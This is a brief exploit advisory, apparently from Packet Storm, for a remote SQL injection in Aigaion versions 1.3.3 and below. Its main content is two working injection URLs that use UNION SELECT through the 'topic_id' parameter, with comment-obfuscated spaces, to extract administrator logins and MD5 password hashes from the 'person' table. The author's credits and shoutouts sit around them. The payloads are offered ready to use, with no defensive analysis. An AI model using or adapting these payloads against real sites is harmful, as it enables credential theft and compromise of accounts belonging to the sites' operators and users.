Aigaion versions 1.3.3 and below suffer from a remote SQL injection vulnerability.
f477c1fa8a2e114029b99bdb32b4e04daf91e335c09d3b6bb2d7b210360b4821--==+================================================================================+==--
--==+ Aigaion <= 1.3.3 SQL Injection Exploit +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net
Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--
EXPLOITS:
http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58),password),null/**/FROM/**/person/**/WHERE/**/ID=1--
http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FROM/**/person--
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed